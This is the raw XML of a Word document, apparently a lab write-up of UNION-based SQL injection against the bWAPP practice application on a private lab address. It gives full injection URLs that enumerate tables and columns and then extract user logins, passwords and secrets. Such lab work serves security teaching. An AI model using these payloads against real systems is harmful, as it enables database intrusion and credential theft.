          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>),ver</w:t>
      </w:r>
      <w:r w:rsidR="009552B5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>si</w:t>
      </w:r>
      <w:r w:rsidRPr="009552B5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>on</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009552B5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>(),5,6,7</w:t>
      </w:r>
      <w:r w:rsidRPr="009552B5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>-- -&amp;action=search</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="055C535B" w14:textId="530D8F73" w:rsidR="004116B9" w:rsidRPr="009552B5" w:rsidRDefault="004116B9" w:rsidP="00145C51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9552B5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251675648" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6AF35569" wp14:editId="2A3EE556">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>182880</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>332105</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5943600" cy="3336925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AEBF89" w14:textId="667DB01C" w:rsidR="000B3BC6" w:rsidRPr="009552B5" w:rsidRDefault="000B3BC6" w:rsidP="00145C51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6EF0F644" w14:textId="086E9731" w:rsidR="000B3BC6" w:rsidRPr="009552B5" w:rsidRDefault="000B3BC6" w:rsidP="00145C51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53C36D5C" w14:textId="757CE296" w:rsidR="00145C51" w:rsidRPr="009552B5" w:rsidRDefault="00145C51" w:rsidP="00145C51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46E567C1" w14:textId="28473AC6" w:rsidR="00145C51" w:rsidRPr="009552B5" w:rsidRDefault="00145C51" w:rsidP="00145C51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0B776151" w14:textId="08103C04" w:rsidR="00145C51" w:rsidRPr="009552B5" w:rsidRDefault="00145C51" w:rsidP="00145C51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27E678D9" w14:textId="4FB6DB19" w:rsidR="00145C51" w:rsidRPr="009552B5" w:rsidRDefault="00145C51" w:rsidP="00145C51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7A0C5051" w14:textId="3446E8EB" w:rsidR="00811CA8" w:rsidRDefault="00811CA8" w:rsidP="00145C51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1F625BE9" w14:textId="1B6CB9A3" w:rsidR="009552B5" w:rsidRDefault="009552B5" w:rsidP="00145C51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351A5A56" w14:textId="4F0870F4" w:rsidR="009552B5" w:rsidRDefault="009552B5" w:rsidP="00145C51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11E22712" w14:textId="2C019CA1" w:rsidR="009552B5" w:rsidRDefault="009552B5" w:rsidP="00145C51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54E2A414" w14:textId="77777777" w:rsidR="009552B5" w:rsidRPr="009552B5" w:rsidRDefault="009552B5" w:rsidP="00145C51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1DF9CF15" w14:textId="6AF00B9B" w:rsidR="00145C51" w:rsidRPr="009552B5" w:rsidRDefault="00811CA8" w:rsidP="00145C51">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009552B5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">we got database name and its version, we will try to get table name </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A1E70ED" w14:textId="431F675E" w:rsidR="00811CA8" w:rsidRPr="009552B5" w:rsidRDefault="00811CA8" w:rsidP="00145C51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7BD0B991" w14:textId="5A50688F" w:rsidR="002E5527" w:rsidRPr="009552B5" w:rsidRDefault="00811CA8" w:rsidP="002E5527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9552B5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">http://192.168.56.101/bWAPP/sqli_1.php?title=1' union select </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009552B5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>1,table</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009552B5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">_name,3,4,5,6,7 from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009552B5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>information_schema.tables</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009552B5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> where </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009552B5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>table_schema</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009552B5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>=database()-- -&amp;action=search</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7309D17D" w14:textId="12F5ACAA" w:rsidR="002E5527" w:rsidRPr="009552B5" w:rsidRDefault="002E5527" w:rsidP="002E5527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298CA218" w14:textId="344C8670" w:rsidR="002E5527" w:rsidRPr="009552B5" w:rsidRDefault="00811CA8" w:rsidP="002E5527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9552B5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251669504" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1696D9CD" wp14:editId="00BF45DE">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>220980</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>231140</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5943600" cy="4698365"/>
            <wp:effectExtent l="0" t="0" r="0" b="698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8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D07E57" w14:textId="268B8C73" w:rsidR="002E5527" w:rsidRPr="009552B5" w:rsidRDefault="002E5527" w:rsidP="002E5527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5297DE22" w14:textId="2731ADB2" w:rsidR="002E5527" w:rsidRPr="009552B5" w:rsidRDefault="002E5527" w:rsidP="002E5527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37E15C5B" w14:textId="5BA0EEF7" w:rsidR="002E5527" w:rsidRPr="009552B5" w:rsidRDefault="002E5527" w:rsidP="002E5527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47FC66C0" w14:textId="7D7E6FC4" w:rsidR="002E5527" w:rsidRPr="009552B5" w:rsidRDefault="00811CA8" w:rsidP="002E5527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9552B5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>We have got 4 tables but we are only focused on table name users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47112DE1" w14:textId="3EAFC003" w:rsidR="000B3BC6" w:rsidRPr="009552B5" w:rsidRDefault="000B3BC6" w:rsidP="002E5527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776619BD" w14:textId="22F66205" w:rsidR="000B3BC6" w:rsidRPr="009552B5" w:rsidRDefault="000B3BC6" w:rsidP="002E5527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611B251E" w14:textId="696BDECA" w:rsidR="000B3BC6" w:rsidRPr="009552B5" w:rsidRDefault="000B3BC6" w:rsidP="002E5527">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A4EE4FD" w14:textId="36A466AA" w:rsidR="000B3BC6" w:rsidRPr="009552B5" w:rsidRDefault="00811CA8" w:rsidP="002E5527">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009552B5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">With the help of table </w:t>
      </w:r>
      <w:r w:rsidR="009552B5" w:rsidRPr="009552B5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>name,</w:t>
      </w:r>
      <w:r w:rsidRPr="009552B5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> we will try to get columns present in database </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38A79B3F" w14:textId="55894778" w:rsidR="00811CA8" w:rsidRPr="009552B5" w:rsidRDefault="00811CA8" w:rsidP="002E5527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9552B5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">http://192.168.56.101/bWAPP/sqli_1.php?title=1' union select </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009552B5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>1,column</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009552B5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">_name,3,4,5,6,7 from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009552B5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>information_schema.columns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009552B5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> where </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009552B5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>table_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009552B5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>='users'-- -&amp;action=search</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C6EDD44" w14:textId="11A287F2" w:rsidR="000B3BC6" w:rsidRPr="009552B5" w:rsidRDefault="000B3BC6" w:rsidP="002E5527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3204D58F" w14:textId="2345F6B4" w:rsidR="000B3BC6" w:rsidRPr="009552B5" w:rsidRDefault="00811CA8" w:rsidP="002E5527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9552B5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251677696" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4E0A2C81" wp14:editId="747689DB">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1112520</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>422910</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5943600" cy="3931285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1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FCD885" w14:textId="449D8477" w:rsidR="002E5527" w:rsidRPr="009552B5" w:rsidRDefault="002E5527" w:rsidP="002E5527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770BA55A" w14:textId="65E8DB37" w:rsidR="002E5527" w:rsidRPr="009552B5" w:rsidRDefault="002E5527" w:rsidP="002E5527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0EF7F933" w14:textId="1A2DBE08" w:rsidR="002E5527" w:rsidRPr="009552B5" w:rsidRDefault="002E5527" w:rsidP="002E5527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0F732346" w14:textId="404D422A" w:rsidR="002E5527" w:rsidRPr="009552B5" w:rsidRDefault="00811CA8" w:rsidP="002E5527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9552B5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">We have got 12 columns inside user table </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C683AC5" w14:textId="554210E8" w:rsidR="002E5527" w:rsidRPr="009552B5" w:rsidRDefault="002E5527" w:rsidP="002E5527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3005121C" w14:textId="1E2D76D0" w:rsidR="002E5527" w:rsidRPr="009552B5" w:rsidRDefault="00811CA8" w:rsidP="002E5527">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009552B5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251673600" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3BB3791F" wp14:editId="2D73E4EF">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>426720</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>869315</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5943600" cy="3469005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52B5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">we want usernames and password of user present inside the database </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5133CF78" w14:textId="4A72CEAD" w:rsidR="00811CA8" w:rsidRPr="009552B5" w:rsidRDefault="00811CA8" w:rsidP="002E5527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9552B5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">http://192.168.56.101/bWAPP/sqli_1.php?title=1' union select </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009552B5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>1,login</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009552B5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>,password,secret,5,6,7 from users-- -&amp;action=search</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00811CA8" w:rsidRPr="009552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C5534" w14:textId="77777777" w:rsidR="001D1BBD" w:rsidRDefault="001D1BBD" w:rsidP="00145C51">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="772BC931" w14:textId="77777777" w:rsidR="001D1BBD" w:rsidRDefault="001D1BBD" w:rsidP="00145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89EE8" w14:textId="77777777" w:rsidR="001D1BBD" w:rsidRDefault="001D1BBD" w:rsidP="00145C51">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="4306F871" w14:textId="77777777" w:rsidR="001D1BBD" w:rsidRDefault="001D1BBD" w:rsidP="00145C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C5F"/>
    <w:rsid w:val="000B3BC6"/>
    <w:rsid w:val="001167D2"/>
    <w:rsid w:val="00145C51"/>
    <w:rsid w:val="001D1BBD"/>
    <w:rsid w:val="00231A09"/>
    <w:rsid w:val="002E5527"/>
    <w:rsid w:val="004116B9"/>
    <w:rsid w:val="004B1A58"/>
    <w:rsid w:val="00714D41"/>
    <w:rsid w:val="00810C5F"/>
    <w:rsid w:val="00811CA8"/>
    <w:rsid w:val="00817837"/>
    <w:rsid w:val="009552B5"/>
    <w:rsid w:val="00AA338F"/>
    <w:rsid w:val="00E1461F"/>
    <w:rsid w:val="00E70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27E70"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{0CC124DA-9A3A-44C2-BB14-ED8DAEB7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5C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C51"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00145C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C51"/>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0081783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56.102/bWAPP/sqli_1.php?title=man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hyperlink" Target="http://192.168.56.102/bWAPP/sqli_1.php?title=man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CDE1B-D850-4475-A70C-98E5C14D3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 Gupta</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Rahul Gupta</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-12-28T06:12:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-12-28T06:12:00Z</dcterms:modified>
</cp:coreProperties>
</file>